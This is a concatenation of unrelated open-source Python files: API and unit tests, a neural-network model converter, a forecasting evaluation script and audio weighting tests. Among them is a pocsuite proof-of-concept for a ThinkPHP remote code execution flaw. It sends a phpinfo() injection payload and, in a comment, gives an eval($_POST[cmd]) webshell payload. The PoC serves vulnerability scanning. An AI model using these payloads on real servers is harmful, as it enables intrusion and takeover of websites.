destination = urllib.parse.quote(
'/api/artifactstatus/' + str(artifactstatus_api_1.artifactstatus_id) + '/',
safe='/',
)
# create PUT string
putstring = {"artifactstatus_name": "new_artifactstatus_api_1"}
# get response
response = self.client.put(
destination, data=putstring, content_type='application/json'
)
# compare
self.assertEqual(response.status_code, 405)
def test_artifactstatus_detail_api_redirect(self):
"""test redirect with appending slash"""
# get object
artifactstatus_api_1 = Artifactstatus.objects.get(
artifactstatus_name='artifactstatus_api_1'
)
# login testuser
self.client.login(
username='testuser_artifactstatus_api', password='<PASSWORD>'
)
# create url
destination = urllib.parse.quote(
'/api/artifactstatus/' + str(artifactstatus_api_1.artifactstatus_id) + '/',
safe='/',
)
# get response
response = self.client.get(
'/api/artifactstatus/' + str(artifactstatus_api_1.artifactstatus_id),
follow=True,
)
# compare
self.assertRedirects(
response, destination, status_code=301, target_status_code=200
)
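# Usage note (runner assumed): these API tests run with Django's standard test runner, e.g.
#   python manage.py test dfirtrack_api.tests.dfirtrack_artifacts.artifactstatus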
|
PyObjCTest/test_nsconnection.py | Khan/pyobjc-framework-Cocoa | 132 | 12716411 | from PyObjCTools.TestSupport import *
from Foundation import *
try:
unicode
except NameError:
unicode = str
class TestNSConnectionHelper (NSObject):
def makeNewConnection_sender_(self, a, b): return 1
def connection_shouldMakeNewConnection_(self, a, b): return 1
def authenticateComponents_withData_(self, a, b): return 1
def connection_handleRequest_(self, a, b): return 1
class TestNSConnection (TestCase):
def testConstants(self):
self.assertIsInstance(NSConnectionReplyMode, unicode)
self.assertIsInstance(NSConnectionDidDieNotification, unicode)
self.assertIsInstance(NSFailedAuthenticationException, unicode)
self.assertIsInstance(NSConnectionDidInitializeNotification, unicode)
def testMethods(self):
self.assertArgIsBOOL(NSConnection.setIndependentConversationQueueing_, 0)
self.assertResultIsBOOL(NSConnection.independentConversationQueueing)
self.assertResultIsBOOL(NSConnection.isValid)
self.assertResultIsBOOL(NSConnection.registerName_)
self.assertResultIsBOOL(NSConnection.registerName_withNameServer_)
self.assertResultIsBOOL(NSConnection.multipleThreadsEnabled)
def testProtocols(self):
self.assertResultIsBOOL(TestNSConnectionHelper.makeNewConnection_sender_)
self.assertResultIsBOOL(TestNSConnectionHelper.connection_shouldMakeNewConnection_)
self.assertResultIsBOOL(TestNSConnectionHelper.authenticateComponents_withData_)
self.assertResultIsBOOL(TestNSConnectionHelper.connection_handleRequest_)
if __name__ == "__main__":
main()
|
nnef_tools/conversion/nnef_to_tflite.py | KhronosGroup/NNEF-Tools | 193 | 12716424 | <gh_stars>100-1000
# Copyright (c) 2020 The Khronos Group Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division, print_function, absolute_import
from .converter import ConverterFromNNEF as _Converter, Transform, ConversionError
from .nnef_to_tf import Converter as _TFConverter, _Transforms as _TFTransforms
from ..model import Tensor, Operation
from ..model.utils import generate_tensor_names_from_op_type
from ..io.tf.lite import CustomOptionsKey
import numpy as np
import copy
def tflite_detection_postprocess_shape(input, scores, anchors, **kwargs):
return [], [], [], []
class Converter(_TFConverter):
@staticmethod
def defined_shapes():
return {
'relu6': lambda shape: shape,
'TFLite_Detection_PostProcess': tflite_detection_postprocess_shape,
}
@staticmethod
def decomposed_operations():
return _Converter.decomposed_operations()
def __init__(self, io_transpose=False, custom_transforms=None, custom_functions=None, mirror_unsupported=False):
_Converter.__init__(self, transforms=self.merge_transforms(_Transforms, custom_transforms),
functions=custom_functions, mirror_unsupported=mirror_unsupported)
self._data_format = 'NXC'
self._io_transpose = io_transpose
def __call__(self, graph):
graph = _TFConverter.__call__(self, graph)
self._generate_tensor_names(graph)
self._fix_custom_options(graph)
return graph
def _global_attribs(self):
return {'_lite_': True}
def _prepare(self, graph):
self._fix_quantized_dtypes(graph)
self._fix_quantization_attribs(graph)
self._transpose_externals(graph)
def _transpose_externals(self, graph):
for tensor in graph.tensors:
mapped = self._tensor_map[tensor]
if mapped.producer and mapped.producer.type == 'external' and self.needs_io_transpose(tensor):
self._transposes[tensor] = self.ncx_to_nxc(tensor.shape)
def _generate_tensor_names(self, graph):
generate_tensor_names_from_op_type(graph)
placeholders = 0
constants = 0
for tensor in graph.tensors:
if tensor.name is None:
if tensor.data is None:
placeholders += 1
tensor.name = 'PLACEHOLDER' + str(placeholders)
else:
constants += 1
tensor.name = 'CONSTANT' + str(constants)
def _fix_quantized_dtypes(self, graph):
for tensor in graph.tensors:
if tensor.quant and tensor.dtype == np.float32:
bits = tensor.quant['bits']
signed = tensor.quant['signed']
assert bits == 8 or bits == 32
tensor.dtype = (np.int8 if signed else np.uint8) if bits == 8 else (np.int32 if signed else np.uint32)
def _fix_quantization_attribs(self, graph):
for tensor in graph.tensors:
if tensor.quant:
opname = tensor.quant['op-name']
if opname != 'zero_point_linear_quantize':
raise ConversionError("Quantization operation '{}' cannot be converted to TFLite")
del tensor.quant['op-name']
del tensor.quant['bits']
if 'signed' in tensor.quant:
del tensor.quant['signed']
if 'symmetric' in tensor.quant:
del tensor.quant['symmetric']
def _fix_custom_options(self, graph):
for op in graph.operations:
if op.custom:
options = op.attribs.get(CustomOptionsKey)
if options is not None:
op.attribs[CustomOptionsKey] = bytes.fromhex(options)
def _make_constant(self, graph, dtype, value, inline):
return Tensor(graph, dtype=dtype, shape=self._shape_of(value), data=value)
def _ensure_constant_producer(self, tensor):
pass
def _transform_constant(self, tensor, func):
data = func(tensor.data)
tensor.shape = data.shape
tensor.data = data
def _squeeze_operation(self, input, output, axes):
Operation(input.graph, type='SQUEEZE', inputs=input, outputs=output, attribs={'squeeze_dims': axes})
def _unsqueeze_operation(self, input, output, axes):
if len(axes) == 1:
Operation(input.graph, type='EXPAND_DIMS', inputs=(input, self.as_tensor(axes[0], np.int32)),
outputs=output)
else:
Operation(input.graph, type='RESHAPE', inputs=(input, self.as_tensor(output.shape, np.int32)),
outputs=output, attribs={'new_shape': output.shape})
def _transpose_operation(self, input, output, perm):
Operation(input.graph, type='TRANSPOSE', inputs=(input, self.as_tensor(perm, np.int32)),
outputs=output)
def _reshape_operation(self, input, output, shape):
Operation(input.graph, type='RESHAPE', inputs=(input, self.as_tensor(shape, np.int32)), outputs=output,
attribs={'new_shape': shape})
def _bias_operation(self, input, output, bias):
if not isinstance(bias, Tensor):
bias = self.as_tensor(bias, np.float32)
Operation(input.graph, type='ADD', inputs=(input, bias), outputs=output)
def _scale_operation(self, input, output, scalar):
if not isinstance(scalar, Tensor):
scalar = self.as_tensor(scalar, np.float32)
Operation(input.graph, type='MUL', inputs=(input, scalar), outputs=output)
def _pad_operation(self, input, output, paddings):
if not isinstance(paddings, Tensor):
paddings = self.as_tensor(paddings, np.int64)
Operation(input.graph, type='PAD', inputs=(input, paddings), outputs=output, attribs={})
def is_same_padding(self, input_size, output_size, stride):
return all(o == i // s for i, o, s in zip(input_size, output_size, stride))
def is_valid_padding(self, padding):
return len(padding) != 0 and all(p == (0, 0) for p in padding)
def pad_input(self, input, paddings):
if all(item == (0, 0) for item in paddings):
return input
shape = tuple(p + x + q for x, (p, q) in zip(self._working_shape(input), paddings))
output = Tensor(input.graph, dtype=input.dtype, shape=shape, quant=copy.deepcopy(input.quant))
self._pad_operation(input, output, paddings)
return output
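# Minimal usage sketch (assumptions: an in-memory NNEF graph already built by the package's
# reader; the exact IO entry points live elsewhere in nnef_tools and may differ):
#   converter = Converter(io_transpose=True)
#   tflite_graph = converter(nnef_graph)   # returns a ..model.Graph whose ops use TFLite types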
_Transforms = Converter.unpack_transforms({
('external', 'constant'):
Transform(type=None),
'conv':
Transform(
type='!"CONV_2D" if not depthwise else "DEPTHWISE_CONV_2D"',
cond={
'!I[0].rank == 4': 'rank must be 4',
},
using={
'depthwise': '!groups == 0',
'channels': '!I[0].shape[1]',
'valid_pad': '!is_valid_padding(padding)',
'same_pad': '!is_same_padding(I[0].shape[2:], O[0].shape[2:], stride)',
'pads': '![(0, 0)] + padding + [(0, 0)]',
},
inputs=(
'!transpose_input(I[0]) if same_pad or valid_pad else pad_input(transpose_input(I[0]), pads)',
'!transpose_filter(I[1], format="NXC" if not depthwise else "CXN")',
'!squeeze_vector(I[2])',
),
outputs='!transpose_output(O[0])',
attribs={
'stride_h': '!stride[0]',
'stride_w': '!stride[1]',
'dilation_h_factor': '!dilation[0]',
'dilation_w_factor': '!dilation[1]',
'padding': '!"VALID" if valid_pad else "SAME"',
'depth_multiplier': '!O[0].shape[1] // channels if depthwise else None',
}
),
'deconv':
Transform(
type='TRANSPOSE_CONV',
cond={
'!I[0].rank == 4': 'rank must be 4',
'!groups == 1': 'groups must be 1',
},
using={
'depthwise': '!groups == 0',
'channels': '!O[0].shape[1]',
'valid_pad': '!is_valid_padding(padding)',
'same_pad': '!is_same_padding(I[0].shape[2:], O[0].shape[2:], stride)',
'pads': '![(0, 0)] + padding + [(0, 0)]',
},
inputs=(
'!as_tensor(ncx_to_nxc(output_shape), np.int32)',
'!transpose_filter(I[1], format="CXN" if not depthwise else "NXC")',
'!transpose_input(I[0]) if same_pad or valid_pad else pad_input(transpose_input(I[0]), pads)',
),
outputs='!bias_add(transpose_output(O[0]), squeeze_vector(I[2]) if I[2].rank == 2 else I[2])',
attribs={
'stride_h': '!stride[0]',
'stride_w': '!stride[1]',
'padding': '!"VALID" if valid_pad else "SAME"',
'depth_multiplier': '!I[1].shape[0] // channels if depthwise else None',
}
),
('max_pool', 'avg_pool'):
Transform(
cond={
                '!size[0] == 1 and size[1] == 1': 'size must be 1 in batch and channel dimensions',
'!stride[0] == 1 and stride[1] == 1': 'stride must be 1 in batch and channel dimensions',
},
type=('MAX_POOL_2D', 'AVERAGE_POOL_2D'),
using={
'valid_pad': '!is_valid_padding(padding)',
'same_pad': '!is_same_padding(I[0].shape[2:], O[0].shape[2:], stride[2:])',
},
inputs=(
'!transpose_input(I[0]) if same_pad or valid_pad else pad_input(transpose_input(I[0]), padding)',
),
outputs=(
'!transpose_output(O[0])',
),
attribs={
'filter_height': '!size[2]',
'filter_width': '!size[3]',
'stride_h': '!stride[2]',
'stride_w': '!stride[3]',
'padding': '!"VALID" if valid_pad else "SAME"',
}
),
'reshape':
Transform(
type='RESHAPE',
using={
'new_shape': '!fixed_batch(shape, I[0].shape[0])',
},
inputs=(
'!undo_transpose(I[0])',
'!as_tensor(new_shape, np.int32)',
),
outputs='!O[0]',
attribs={
'new_shape': '!new_shape',
}
),
'concat':
Transform(
type='CONCATENATION',
inputs=['!I[:]'],
outputs='!transpose_like(O[0], I[0])',
attribs={
'axis': '!transpose_axis_like(axis, I[0])',
}
),
'copy':
Transform(
type='RESHAPE',
using={
'shape': '!transpose_list_like(I[0].shape, I[0])',
},
inputs=(
'!I[0]',
'!as_tensor(shape, np.int32)',
),
outputs='!transpose_like(O[0], I[0])',
attribs={
'new_shape': '!shape',
}
),
'linear':
Transform(
type='FULLY_CONNECTED',
inputs=(
'!I[0]',
'!I[1]',
'!squeeze_vector(I[2]) if not is_zero(I[2]) else None',
),
outputs='!O[0]',
attribs={
'fused_activation_function': "NONE",
'weights_format': "DEFAULT",
'keep_num_dims': True,
'asymmetric_quantize_inputs': False,
}
),
'batch_normalization':
Transform(
type='MUL',
cond={
'!I[1].data is not None and I[2].data is not None and'
' (len(I) == 3 or I[3].data is not None) and (len(I) == 4 or I[4].data is not None)':
'all parameters must be constants',
'!not any(t.quant for t in I)': 'quantized inputs or parameters are not supported',
},
using={
'mean': '!np.squeeze(I[1].data, axis=0) if I[1].data is not None else None',
'std': '!np.squeeze(np.sqrt(I[2].data + epsilon), axis=0) if I[2].data is not None else None',
'offset': '!np.squeeze(I[3].data, axis=0) if I[3].data is not None else None if len(I) > 3 else 0',
'scale': '!np.squeeze(I[4].data, axis=0) if I[4].data is not None else None if len(I) > 4 else 1',
},
inputs=(
'!transpose_input(I[0])',
'!as_tensor(scale / std, np.float32)',
),
outputs='!bias_add(transpose_like(O[0], I[0]), as_tensor(offset - scale * mean / std, np.float32))',
),
'l2_normalization':
Transform(
type='L2_NORMALIZATION',
cond={
'!axes == list(range(I[0].rank))': 'axes must denote all dimensions',
},
inputs='!I[0]',
outputs='!transpose_like(O[0], I[0])',
),
'prelu':
Transform(
type='PRELU',
inputs=('!I[0]', '!I[1]'),
outputs='!transpose_like(O[0], I[0])',
),
'pad':
Transform(
type='!"PAD" if border == "constant" else "MIRROR_PAD"',
cond={
'!border in ["constant", "reflect", "reflect-even"]':
'border must be one of "constant", "reflect", "reflect-even"',
},
using={'paddings': '![list(item) for item in padding]'},
inputs=(
'!I[0]',
'!as_tensor(ncx_to_nxc(paddings, cond=transposing(I[0])), np.int32)',
),
outputs='!transpose_like(O[0], I[0])',
attribs={
'mode': '!0 if border == "reflect" else 1 if border == "reflect-even" else None',
},
),
'gather':
Transform(
type='GATHER',
inputs=('!I[0]', '!I[1]'),
outputs='!transpose_like(O[0], I[0])',
attribs={
'axis': '!transpose_axis_like(axis, I[0])',
},
),
'cast':
Transform(
type='CAST',
inputs='!I[0]',
outputs='!transpose_like(O[0], I[0])',
attribs={
'in_data_type': '!I[0].dtype',
'out_data_type': '!O[0].dtype',
},
),
# 'copy': _TFTransforms['copy'].with_type('IDENTITY'), # only works in TF 2.3
'transpose': _TFTransforms['transpose'].with_type('TRANSPOSE'),
'split': _TFTransforms['split'].with_type('SPLIT_V'),
'squeeze': _TFTransforms['squeeze'].with_type('SQUEEZE'),
'unsqueeze': _TFTransforms['unsqueeze'].with_type('!"EXPAND_DIMS" if len(axes) == 1 else "RESHAPE"'),
'relu': _TFTransforms['relu'].with_type('RELU'),
'relu6': _TFTransforms['relu6'].with_type('RELU6'),
'elu': _TFTransforms['elu'].with_type('ELU'),
'leaky_relu': _TFTransforms['leaky_relu'].with_type('LEAKY_RELU'),
'sigmoid': _TFTransforms['sigmoid'].with_type('LOGISTIC'),
'sin': _TFTransforms['sin'].with_type('SIN'),
'cos': _TFTransforms['cos'].with_type('COS'),
'tan': _TFTransforms['tan'].with_type('TAN'),
'asin': _TFTransforms['asin'].with_type('ASIN'),
'acos': _TFTransforms['acos'].with_type('ACOS'),
'atan': _TFTransforms['atan'].with_type('ATAN'),
'sinh': _TFTransforms['sinh'].with_type('SINH'),
'cosh': _TFTransforms['cosh'].with_type('COSH'),
'tanh': _TFTransforms['tanh'].with_type('TANH'),
'asinh': _TFTransforms['asinh'].with_type('ASINH'),
'acosh': _TFTransforms['acosh'].with_type('ACOSH'),
'atanh': _TFTransforms['atanh'].with_type('ATANH'),
'exp': _TFTransforms['exp'].with_type('EXP'),
'log': _TFTransforms['log'].with_type('LOG'),
'abs': _TFTransforms['abs'].with_type('ABS'),
'neg': _TFTransforms['neg'].with_type('NEG'),
'not': _TFTransforms['not'].with_type('LOGICAL_NOT'),
'floor': _TFTransforms['floor'].with_type('FLOOR'),
'ceil': _TFTransforms['ceil'].with_type('CEIL'),
'round': _TFTransforms['round'].with_type('ROUND'),
'sqr': _TFTransforms['sqr'].with_type('SQUARE'),
'sqrt': _TFTransforms['sqrt'].with_type('SQRT'),
'rsqrt': _TFTransforms['rsqrt'].with_type('RSQRT'),
'add': _TFTransforms['add'].with_type('ADD'),
'sub': _TFTransforms['sub'].with_type('SUB'),
'mul': _TFTransforms['mul'].with_type('MUL'),
'div': _TFTransforms['div'].with_type('DIV'),
'pow': _TFTransforms['pow'].with_type('POW'),
'min': _TFTransforms['min'].with_type('MINIMUM'),
'max': _TFTransforms['max'].with_type('MAXIMUM'),
'and': _TFTransforms['and'].with_type('LOGICAL_AND'),
'or': _TFTransforms['or'].with_type('LOGICAL_OR'),
'lt': _TFTransforms['lt'].with_type('LESS'),
'le': _TFTransforms['le'].with_type('LESS_EQUAL'),
'gt': _TFTransforms['gt'].with_type('GREATER'),
'ge': _TFTransforms['ge'].with_type('GREATER_EQUAL'),
'eq': _TFTransforms['eq'].with_type('EQUAL'),
'ne': _TFTransforms['ne'].with_type('NOT_EQUAL'),
'select': _TFTransforms['select'].with_type('SELECT'),
'min_reduce': _TFTransforms['min_reduce'].with_type('REDUCE_MIN'),
'max_reduce': _TFTransforms['max_reduce'].with_type('REDUCE_MAX'),
'mean_reduce': _TFTransforms['mean_reduce'].with_type('MEAN'),
'sum_reduce': _TFTransforms['sum_reduce'].with_type('SUM'),
'any_reduce': _TFTransforms['any_reduce'].with_type('REDUCE_ANY'),
'all_reduce': _TFTransforms['all_reduce'].with_type('REDUCE_ALL'),
'argmin_reduce': _TFTransforms['argmin_reduce'].with_type('ARG_MIN'),
'argmax_reduce': _TFTransforms['argmax_reduce'].with_type('ARG_MAX'),
'stack': _TFTransforms['stack'].with_type('PACK'),
'unstack': _TFTransforms['unstack'].with_type('UNPACK'),
'tile': _TFTransforms['tile'].with_type('TILE'),
'slice': _TFTransforms['slice'].with_type('STRIDED_SLICE'),
'softmax': _TFTransforms['softmax'].with_type('SOFTMAX'),
'local_response_normalization': _TFTransforms['local_response_normalization'].with_type('LOCAL_RESPONSE_NORMALIZATION'),
'nearest_upsample': _TFTransforms['nearest_upsample'].with_type('RESIZE_NEAREST_NEIGHBOR'),
'nearest_downsample': _TFTransforms['nearest_downsample'].with_type('RESIZE_NEAREST_NEIGHBOR'),
'multilinear_upsample': _TFTransforms['multilinear_upsample'].with_type('RESIZE_BILINEAR'),
'add_n': _TFTransforms['add_n'].with_type('ADD_N'),
})
|
vul/4-thinkphp-getshell.py | zx273983653/vulscan | 582 | 12716448 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""
# command-line mode
from pocsuite import pocsuite_cli
# verify mode
from pocsuite import pocsuite_verify
# attack mode
from pocsuite import pocsuite_attack
# console mode
from pocsuite import pocsuite_console
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
class ThinkphpPOC(POCBase):
    vulID = '4'  # ssvid ID; write 0 if the PoC is submitted together with the vulnerability
    version = '1'  # defaults to 1
    vulDate = '2017-03-01'  # date the vulnerability was disclosed; use today's date if unknown
    author = 'ly55521'  # PoC author
    createDate = '2017-03-01'  # date the PoC was written
    updateDate = '2017-03-01'  # date the PoC was last updated; defaults to the creation date
    references = 'http://0535code.com/'  # reference for the vulnerability; not needed for 0days
    name = 'Thinkphp Command execution'  # PoC name
    appPowerLink = 'http://www.thinkphp.cn/'  # vendor homepage
    appName = 'Thinkphp'  # affected application name
    appVersion = 'Thinkphp 0.0-3.1 Lite'  # affected versions
    vulType = 'code-exec'  # vulnerability type; see the vulnerability type reference table
    desc = '''
            Thinkphp regex /e mode code execution vulnerability
            '''  # brief description of the vulnerability
    samples = ["http://down.51cto.com/data/283085","/examples/Blog/index.php"]  # samples: targets the PoC was successfully tested against
    install_requires = []  # third-party module dependencies; avoid them where possible (see the PoC dependency guidelines)
    cvss = u"严重"  # severity: 严重 (critical), 高危 (high), 中危 (medium), 低危 (low)
    # verify the vulnerability: pocsuite -r 4-thinkphp-getshell.py -u 1.1.1.1 --verify
def _verify(self):
        # result dict to return
        result = {}
        # build the vulnerable URL
import urlparse
vul_url = urlparse.urlparse(self.url).scheme + "://" + urlparse.urlparse(self.url).netloc
send_payload = "/index.php/module/aciton/param1/${@phpinfo()}"
url = vul_url + send_payload
#print url
try:
            r = req.get(url=url, timeout=5, allow_redirects=False)  # do not follow redirects
            if r.status_code == 200 and "<title>phpinfo()</title>" in r.text:
                #print u"vulnerable"
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
result['VerifyInfo']['Payload'] = send_payload
else:
result = {}
except Exception,e:
#print "error!"
result = {}
print '[+]4 poc done'
return self.save_output(result)
    # attack the vulnerability
def _attack(self):
result = {}
        # attack payload:
# /index.php/module/action/param1/{${eval($_POST[cmd])}}
return self._verify()
def save_output(self, result):
        # report success or failure depending on whether a result was found
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
register(ThinkphpPOC)
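# Attack mode mirrors the verify example above (pocsuite CLI flag assumed):
#   pocsuite -r 4-thinkphp-getshell.py -u http://target/ --attack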
|
experiments/arima_prophet_adapter/src/evaluation.py | Nixtla/statsforecast | 483 | 12716463 | from itertools import product
import numpy as np
import pandas as pd
from neuralforecast.losses.numpy import mape, rmse, smape, mae, mase
from neuralforecast.data.datasets.m4 import M4Evaluation, M4Info
from src.data import get_data, dict_datasets
def evaluate(lib: str, dataset: str, group: str):
try:
forecast = pd.read_csv(f'data/{lib}-forecasts-{dataset}-{group}.csv')
except:
return None
y_train, horizon, freq, seasonality = get_data('data/', dataset, group)
y_train = y_train['y'].values
y_test, *_ = get_data('data/', dataset, group, False)
y_test = y_test['y'].values.reshape(-1, horizon)
y_hat = forecast[lib].values.reshape(-1, horizon)
evals = {}
for metric in (mape, smape):
metric_name = metric.__name__
if metric_name == 'mase':
loss = mase(y_test, y_hat, y_train, seasonality=seasonality)
loss = loss.mean()
else:
loss = metric(y_test, y_hat, axis=1).mean()
evals[metric_name] = loss
evals = pd.DataFrame(evals, index=[f'{dataset}_{group}']).rename_axis('dataset').reset_index()
times = pd.read_csv(f'data/{lib}-time-{dataset}-{group}.csv')
evals = pd.concat([evals, times], axis=1)
return evals
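# Example of the file layout this function expects (paths follow the reads above; the raw
# series must also be available to get_data under data/):
#   evals = evaluate('prophet', 'M3', 'Other')   # reads data/prophet-forecasts-M3-Other.csv
#                                                # and data/prophet-time-M3-Other.csv,
#                                                # returns a one-row DataFrame or None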
if __name__ == '__main__':
groups = ['Yearly', 'Quarterly', 'Monthly', 'Other', 'Daily', 'Hourly', 'Weekly']
lib = ['arima_prophet_adapter', 'prophet']
datasets = ['M3', 'Tourism', 'M4', 'PeytonManning']
evaluation = [evaluate(lib, dataset, group) for lib, group in product(lib, groups) for dataset in datasets]
evaluation = [eval_ for eval_ in evaluation if eval_ is not None]
evaluation = pd.concat(evaluation)
evaluation = evaluation[['dataset', 'model', 'mape', 'smape', 'time']]
evaluation['time'] /= 60 #minutes
evaluation = evaluation.set_index(['dataset', 'model']).stack().reset_index()
evaluation.columns = ['dataset', 'model', 'metric', 'val']
evaluation = evaluation.set_index(['dataset', 'metric', 'model']).unstack().round(2)
evaluation = evaluation.droplevel(0, 1).reset_index()
evaluation.to_csv('data/evaluation.csv')
|
waveform_analysis/tests/test_ABC_weighting.py | pirun/waveform_analysis | 125 | 12716464 | import pytest
from scipy import signal
from scipy.interpolate import interp1d
import numpy as np
from numpy import pi
# This package must first be installed with `pip install -e .` or similar
from waveform_analysis import ABC_weighting, A_weighting, A_weight
# It will plot things for sanity-checking if MPL is installed
try:
import matplotlib.pyplot as plt
mpl = True
except ImportError:
mpl = False
# ANSI S1.4-1983 Table AI "Exact frequency"
frequencies = np.array((10.00, 12.59, 15.85, 19.95, 25.12, 31.62, 39.81,
50.12, 65.10, 79.43, 100.00, 125.90, 158.50, 199.50,
251.20, 316.20, 398.10, 501.20, 631.00, 794.30,
1000.00, 1259.00, 1585.00, 1995.00, 2512.00, 3162.00,
3981.00, 5012.00, 6310.00, 7943.00, 10000.00,
12590.00, 15850.00, 19950.00, 25120.00, 31620.00,
39810.00, 50120.00, 63100.00, 79430.00, 100000.00,
))
responses = {}
# ANSI S1.4-1983 Table AI "A weighting"
responses['A'] = np.array((-70.4, -63.4, -56.7, -50.5, -44.7, -39.4, -34.6,
-30.2, -26.2, -22.5, -19.1, -16.1, -13.4, -10.9,
-8.6, -6.6, -4.8, -3.2, -1.9, -0.8, 0.0, +0.6,
+1.0, +1.2, +1.3, +1.2, +1.0, +0.5, -0.1, -1.1,
-2.5, -4.3, -6.6, -9.3, -12.4, -15.8, -19.3, -23.1,
-26.9, -30.8, -34.7,
))
# ANSI S1.4-1983 Table IV "B Weighting"
responses['B'] = np.array((-38.2, -33.2, -28.5, -24.2, -20.4, -17.1, -14.2,
-11.6, -9.3, -7.4, -5.6, -4.2, -3.0, -2.0, -1.3,
-0.8, -0.5, -0.3, -0.1, 0.0, 0.0, 0.0, 0.0, -0.1,
-0.2, -0.4, -0.7, -1.2, -1.9, -2.9, -4.3, -6.1,
-8.4, -11.1,
))
# ANSI S1.4-1983 Table IV "C Weighting"
responses['C'] = np.array((-14.3, -11.2, -8.5, -6.2, -4.4, -3.0, -2.0, -1.3,
-0.8, -0.5, -0.3, -0.2, -0.1, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, -0.1, -0.2, -0.3, -0.5,
-0.8, -1.3, -2.0, -3.0, -4.4, -6.2, -8.5, -11.2,
))
# ANSI S1.4-1983 Table AII "Type 0"
# Stricter than IEC 61672-1 (2002) Table 2 Class 1 (±1.1 dB at 1 kHz)
upper_limits = np.array((+2.0, +2.0, +2.0, +2.0, +1.5, +1.0, +1.0, +1.0, +1.0,
+1.0, +0.7, +0.7, +0.7, +0.7, +0.7, +0.7, +0.7, +0.7,
+0.7, +0.7, +0.7, +0.7, +0.7, +0.7, +0.7, +0.7, +0.7,
+1.0, +1.0, +1.0, +2.0, +2.0, +2.0, +2.0, +2.4, +2.8,
+3.3, +4.1, +4.9, +5.1, +5.6,
))
lower_limits = np.array((-5.0, -4.0, -3.0, -2.0, -1.5, -1.0, -1.0, -1.0, -1.0,
-1.0, -0.7, -0.7, -0.7, -0.7, -0.7, -0.7, -0.7, -0.7,
-0.7, -0.7, -0.7, -0.7, -0.7, -0.7, -0.7, -0.7, -0.7,
-1.0, -1.5, -2.0, -3.0, -3.0, -3.0, -3.0, -4.5, -6.2,
-7.9, -9.3, -10.9, -12.2, -14.3,
))
class TestABCWeighting(object):
def test_invalid_params(self):
with pytest.raises(ValueError):
ABC_weighting('D')
def test_freq_resp(self):
# Test that frequency response meets tolerance from ANSI S1.4-1983
for curve in {'A', 'B', 'C'}:
N = len(responses[curve]) # Number of frequencies in spec
f_test = frequencies[:N]
upper = responses[curve] + upper_limits[:N]
lower = responses[curve] + lower_limits[:N]
z, p, k = ABC_weighting(curve)
w, h = signal.freqs_zpk(z, p, k, 2*pi*f_test)
levels = 20 * np.log10(abs(h))
if mpl:
plt.figure(curve)
plt.title('{}-weighting limits (Type 0)'.format(curve))
plt.semilogx(f_test, levels, alpha=0.7, label='analog')
plt.semilogx(f_test, upper, 'r:', alpha=0.7)
plt.semilogx(f_test, lower, 'r:', alpha=0.7)
plt.grid(True, color='0.7', linestyle='-', which='major')
plt.grid(True, color='0.9', linestyle='-', which='minor')
plt.legend()
assert all(np.less_equal(levels, upper))
assert all(np.greater_equal(levels, lower))
class TestAWeighting(object):
def test_invalid_params(self):
with pytest.raises(TypeError):
A_weighting(fs='spam')
with pytest.raises(ValueError):
A_weighting(fs=10000, output='eggs')
def test_zpkbilinear_bug(self):
# https://github.com/scipy/scipy/pull/7504
# Copied a local version and fixed it, but just to make sure:
z, p, k = A_weighting(fs=48000, output='zpk')
assert k != 0
def test_freq_resp_ba(self):
# Test that frequency response meets tolerance from ANSI S1.4-1983
fs = 300000
b, a = A_weighting(fs)
w, h = signal.freqz(b, a, 2*pi*frequencies/fs)
levels = 20 * np.log10(abs(h))
if mpl:
plt.figure('A')
plt.semilogx(frequencies, levels, alpha=0.7, label='ba')
plt.legend()
assert all(np.less_equal(levels, responses['A'] + upper_limits))
assert all(np.greater_equal(levels, responses['A'] + lower_limits))
def test_freq_resp_zpk(self):
# Test that frequency response meets tolerance from ANSI S1.4-1983
fs = 270000
z, p, k = A_weighting(fs, 'zpk')
w, h = signal.freqz_zpk(z, p, k, 2*pi*frequencies/fs)
levels = 20 * np.log10(abs(h))
if mpl:
plt.figure('A')
plt.semilogx(frequencies, levels, alpha=0.7, label='zpk')
plt.legend()
assert all(np.less_equal(levels, responses['A'] + upper_limits))
assert all(np.greater_equal(levels, responses['A'] + lower_limits))
def test_freq_resp_sos(self):
# Test that frequency response meets tolerance from ANSI S1.4-1983
fs = 400000
sos = A_weighting(fs, output='sos')
w, h = signal.sosfreqz(sos, 2*pi*frequencies/fs)
levels = 20 * np.log10(abs(h))
if mpl:
plt.figure('A')
plt.semilogx(frequencies, levels, alpha=0.7, label='sos')
plt.legend()
assert all(np.less_equal(levels, responses['A'] + upper_limits))
assert all(np.greater_equal(levels, responses['A'] + lower_limits))
class TestAWeight(object):
def test_freq_resp(self):
# Test that frequency response meets tolerance from ANSI S1.4-1983
N = 40000
fs = 300000
impulse = signal.unit_impulse(N)
out = A_weight(impulse, fs)
freq = np.fft.rfftfreq(N, 1/fs)
levels = 20 * np.log10(abs(np.fft.rfft(out)))
if mpl:
plt.figure('A')
plt.semilogx(freq, levels, alpha=0.7, label='fft')
plt.legend()
plt.ylim(-80, +5)
# Interpolate FFT points to measure response at spec's frequencies
func = interp1d(freq, levels)
levels = func(frequencies)
assert all(np.less_equal(levels, responses['A'] + upper_limits))
assert all(np.greater_equal(levels, responses['A'] + lower_limits))
if __name__ == '__main__':
pytest.main([__file__])
|
GUI/maidfiddler/util/logger.py | mix5003/COM3D2.MaidFiddler | 121 | 12716477 | <reponame>mix5003/COM3D2.MaidFiddler
import logging
from maidfiddler.util.util import BASE_DIR
import os.path
logger = logging.getLogger("MaidFiddler")
def setup_logger():
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s [%(levelname)s] : %(message)s')
conoutCh = logging.StreamHandler()
conoutCh.setLevel(logging.DEBUG)
conoutCh.setFormatter(formatter)
fileCh = logging.FileHandler(os.path.join(BASE_DIR, "mf_log.txt"), "w")
